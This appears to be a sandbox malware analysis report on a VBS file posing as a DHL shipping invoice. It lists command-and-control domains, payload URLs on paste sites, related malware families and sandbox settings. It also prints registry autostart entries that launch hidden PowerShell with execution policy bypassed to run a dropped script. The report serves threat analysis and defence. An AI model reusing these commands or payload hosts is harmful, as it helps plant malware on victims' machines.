                    http://geoplugin.net/json.gp | 0% | URL Reputation | safe | -
                    http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe | -
                    https://aka.ms/pscore68 | 0% | URL Reputation | safe | -
                    https://oneget.org | 0% | URL Reputation | safe | -
                    http://www.ebuddy.com | 0% | URL Reputation | safe | -
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    paste.ee | 188.114.96.3 | true | true | - | unknown
                    geoplugin.net | 178.237.33.50 | true | false | - | unknown
                    desckvbrat.com.br | 191.252.83.213 | true | true | - | unknown
                    b2case.com | 188.114.96.3 | true | true | - | unknown
                    pastebin.com | 104.20.4.235 | true | true | - | unknown
                    iwarsut775laudrye001.duckdns.org | 43.226.229.232 | true | true | - | unknown
                    ftp.desckvbrat.com.br | unknown | unknown | true | - | unknown
                    Name | Malicious | Antivirus Detection | Reputation
                    https://paste.ee/d/d80GV/0 | true | - | unknown
                    hjnourt38haoust1.duckdns.org | true | - | unknown
                    https://pastebin.com/raw/pQQ0n3eA | false | - | unknown
                    iwarsut775laudrye3.duckdns.org | true | - | unknown
                    iwarsut775laudrye001.duckdns.org | true | - | unknown
                    https://b2case.com/class.txt | true | - | unknown
                    https://paste.ee/d/r322U/0 | true | - | unknown
                    http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
                    https://paste.ee/d/jm8qu/0 | true | - | unknown
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://ftp.desckvbrat.com.br | powershell.exe, 00000003.00000002.1919143366.000002203D80B000.00000004.00000800.00020000.00000000.sdmp | true | - | unknown
                    http://desckvbrat.com.br | powershell.exe, 00000003.00000002.1919143366.000002203D80B000.00000004.00000800.00020000.00000000.sdmp | true | - | unknown
                    http://www.microsoft.co | powershell.exe, 00000008.00000002.2115107372.000002D4EB8D9000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
                    https://contoso.com/License | powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://b2case.com | powershell.exe, 00000003.00000002.1919143366.000002203C6B6000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
                    https://analytics.paste.ee | powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
                    https://paste.ee | powershell.exe, 00000003.00000002.1919143366.000002203C323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D835000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
                    https://aka.ms/pscore6 | powershell.exe, 00000001.00000002.3078580117.0000015B8005F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://www.google.com | powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe | false | - | unknown
                    http://geoplugin.net/json.gp/C | powershell.exe, 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://contoso.com/ | powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1919143366.000002203DC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2943623698.000002204C172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2409816379.0000015C9A3F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2311218245.000002804C253000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACDCA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC42F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC566000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3550000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://paste.ee/d/jm8qu/08 | powershell.exe, 00000003.00000002.1919143366.000002203C323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D835000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
                    https://oneget.orgX | powershell.exe, 00000007.00000002.1778802424.0000018ACD883000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D49A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://login.yahoo.com/config/login | AddInProcess32.exe | false | URL Reputation: safe | unknown
                    https://cdnjs.cloudflare.com | powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
                    https://cdnjs.cloudflare.com; | powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
                    http://www.nirsoft.net/ | AddInProcess32.exe | false | - | unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.3078580117.0000015B800B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789063987.0000015C8A381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C1E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACC3B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D34D1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://secure.gravatar.com | powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
                    http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1919143366.000002203DC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2943623698.000002204C172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2409816379.0000015C9A3F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2311218245.000002804C253000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACDCA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC42F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC566000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3550000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000007.00000002.1778802424.0000018ACD883000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D49A2000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
                    https://paste.ee/d/jm8qu/0P | powershell.exe, 00000003.00000002.1919143366.000002203D835000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
                    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.1779641476.000002D4D4D6B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://paste.ee | powershell.exe, 00000003.00000002.1919143366.000002203C724000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
                    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000004.00000002.1789063987.0000015C8A5A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C402000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.1779641476.000002D4D4D6B000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
                    https://go.micro | powershell.exe, 00000003.00000002.1919143366.000002203D14E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                                                          https://www.google.com;powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://www.imvu.comAddInProcess32.exefalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://contoso.com/Iconpowershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1779641476.000002D4D4D6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://b2case.compowershell.exe, 00000003.00000002.1919143366.000002203C6BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://geoplugin.net/AddInProcess32.exe, 00000015.00000002.3074510288.0000000000F18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1789063987.0000015C8A5A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C402000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://analytics.paste.ee;powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://www.google.com/accounts/serviceloginAddInProcess32.exefalse
                                                                                      unknown
                                                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.3078580117.0000015B8007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789063987.0000015C8A381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C1E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACC3B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D34D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://paste.ee/d/d80GV/0Ppowershell.exe, 00000003.00000002.1919143366.000002203DB93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://pastebin.compowershell.exe, 0000000D.00000002.1948758053.000001AB895D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://pastebin.compowershell.exe, 0000000D.00000002.1948758053.000001AB893C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://themes.googleusercontent.compowershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://oneget.orgpowershell.exe, 00000007.00000002.1778802424.0000018ACD883000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D49A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://crl.microspowershell.exe, 00000005.00000002.2605240365.0000028054873000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://www.ebuddy.comAddInProcess32.exefalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
188.114.96.3 | paste.ee | European Union | 13335 | CLOUDFLARENETUS | true
43.226.229.232 | iwarsut775laudrye001.duckdns.org | Hong Kong | 36351 | SOFTLAYERUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
191.252.83.213 | desckvbrat.com.br | Brazil | 27715 | LocawebServicosdeInternetSABR | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1539088
Start date and time: 2024-10-22 06:16:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 44
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DHLShippingInvoicesAwbBL000000000102220242247.vbs
Detection: MAL
Classification: mal100.rans.spre.phis.troj.spyw.expl.evad.winVBS@61/45@6/5
EGA Information:
• Successful, ratio: 53.8%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 163
• Number of non-executed functions: 328
Cookbook Comments:
• Found application associated with file extension: .vbs
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1800 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1928 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6908 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7084 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7340 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7372 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big: too many NtCreateKey calls found
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtProtectVirtualMemory calls found
• Report size getting too big: too many NtQueryValueKey calls found
• Report size getting too big: too many NtReadVirtualMemory calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session; view the PCAPs for the complete data
Time | Type | Description
00:17:01 | API Interceptor | 143x Sleep call for process: powershell.exe modified
00:17:58 | API Interceptor | 1213474x Sleep call for process: AddInProcess32.exe modified
05:17:15 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdm cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
05:17:23 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_zhs cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
05:17:31 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdm cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
05:17:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_zhs cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
104.20.4.235 | gabe.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.4.235 | cr_asm_crypter.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.4.235 | vF20HtY4a4.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.4.235 | OSLdZanXNc.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.4.235 | gaber.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.4.235 | cr_asm_crypter.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.4.235 | sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
104.20.4.235 | sostener.vbs | malicious | XWorm | pastebin.com/raw/V9y5Q5vv
104.20.4.235 | envifa.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
104.20.4.235 | New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
188.114.96.3 | BL.exe | malicious | FormBook | www.launchdreamidea.xyz/bd77/
188.114.96.3 | w49A5FG3yg.exe | malicious | DCRat, PureLog Stealer, zgRAT | 733812cm.n9shteam.in/DefaultWordpress.php
188.114.96.3 | 9XHFe6y4Dj.exe | malicious | DCRat, PureLog Stealer, zgRAT | 733812cm.n9shteam.in/DefaultWordpress.php
188.114.96.3 | SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe | malicious | Unknown | servicetelemetryserver.shop/api/index.php
188.114.96.3 | t1zTzS9a3r.exe | malicious | DCRat, PureLog Stealer, zgRAT | abdulbek.top/externalvideoprotectdefaultsqlWindowsdlePrivate.php
188.114.96.3 | aQdB62N7SB.elf | malicious | Shikitega, Xmrig | main.dsn.ovh/dns/lovely
188.114.96.3 | QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/DyuQ5y15/download
188.114.96.3 | zygWTMeQC2.exe | malicious | DCRat, PureLog Stealer, zgRAT | 138231cm.n9shteam.in/CpuApiprotectTemp.php
188.114.96.3 | PURCHASE ORDER-6350.exe | malicious | FormBook | www.cc101.pro/ttiz/
188.114.96.3 | Aunali_khokhawala-In Services.Agreement-SDYAMPA 416944.rtf | malicious | EvilProxy, Fake Captcha, HTMLPhisher | vh26kx.pinboarddisplaced.com/?email=
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
paste.ee | 20042024150836 14.10.2024.vbe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
paste.ee | Swift Payment 20241014839374.vbs | malicious | Remcos | 188.114.96.3
paste.ee | segura.vbs | malicious | AsyncRAT | 188.114.96.3
paste.ee | DHL_Shipping_Invoices_Awb_0000000.vbs | malicious | Remcos | 188.114.97.3
paste.ee | 20062024150836 11.10.2024.vbe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
paste.ee | awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.js | malicious | Remcos | 188.114.97.3
paste.ee | DIEN OMM 10.10.2024.vbe | malicious | Unknown | 188.114.97.3
paste.ee | 10092024150836 09.10.2024.vbe | malicious | FormBook | 188.114.96.3
paste.ee | Logistics1.vbs | malicious | FormBook | 188.114.96.3
paste.ee | SWIFT 103 202410071251443120 071024-pdf.vbs | malicious | Remcos | 188.114.97.3
geoplugin.net | DHL AWB_NO_92847309329.exe | malicious | PureLog Stealer, Remcos | 178.237.33.50
geoplugin.net | Order_MG2027176.vbs | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | Salary Revision_pdf.vbs | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | Scanned_22C-6e24090516030.pdf.vbs | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | Order.vbs | malicious | Remcos | 178.237.33.50
geoplugin.net | rIMG465244247443GULFORDEROpmagasinering.cmd | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | 1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exe | malicious | Remcos | 178.237.33.50
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDFLARENETUSla.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                • 104.29.220.112
                                                                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                • 104.29.0.194
                                                                                                ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                • 172.71.167.138
                                                                                                https://doc.tayato.com/mo6/?top=uwe.geiersbach@bbraun.comGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.37.177
                                                                                                https://mcprod.britwyn.co.nzGet hashmaliciousUnknownBrowse
                                                                                                • 104.17.247.203
                                                                                                Salary_Increase_Approval_Open_Enrollment_202417918.pdfGet hashmaliciousUnknownBrowse
                                                                                                • 104.17.25.14
                                                                                                http://manatoki463.netGet hashmaliciousUnknownBrowse
                                                                                                • 141.101.120.10
                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                • 172.67.206.204
                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                • 104.21.53.8
                                                                                                https://na2.docusign.net/Signing/EmailStart.aspx?a=52f7eab1-67dd-4b2c-9342-8cf1837ca85b&etti=24&acct=8327544d-e5d8-4fb1-8036-f62a8723beb9&er=1f6c0370-0bf0-4639-942a-0c529236b3c5Get hashmaliciousHtmlDropperBrowse
                                                                                                • 188.114.97.3
                                                                                                SOFTLAYERUSbin.armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 169.47.245.36
                                                                                                LNLAncf2v5.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                • 161.159.147.94
                                                                                                la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                • 158.175.138.255
                                                                                                yakuza.sh.elfGet hashmaliciousUnknownBrowse
                                                                                                • 161.159.201.98
                                                                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                • 174.37.138.251
                                                                                                la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                • 172.94.213.128
                                                                                                la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                • 108.168.171.164
                                                                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                • 67.19.213.165
                                                                                                mips.elfGet hashmaliciousUnknownBrowse
                                                                                                • 169.38.239.94
                                                                                                la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                • 149.81.172.98
                                                                                                CLOUDFLARENETUSla.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                • 104.29.220.112
                                                                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                • 104.29.0.194
                                                                                                ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                • 172.71.167.138
                                                                                                https://doc.tayato.com/mo6/?top=uwe.geiersbach@bbraun.comGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.37.177
                                                                                                https://mcprod.britwyn.co.nzGet hashmaliciousUnknownBrowse
                                                                                                • 104.17.247.203
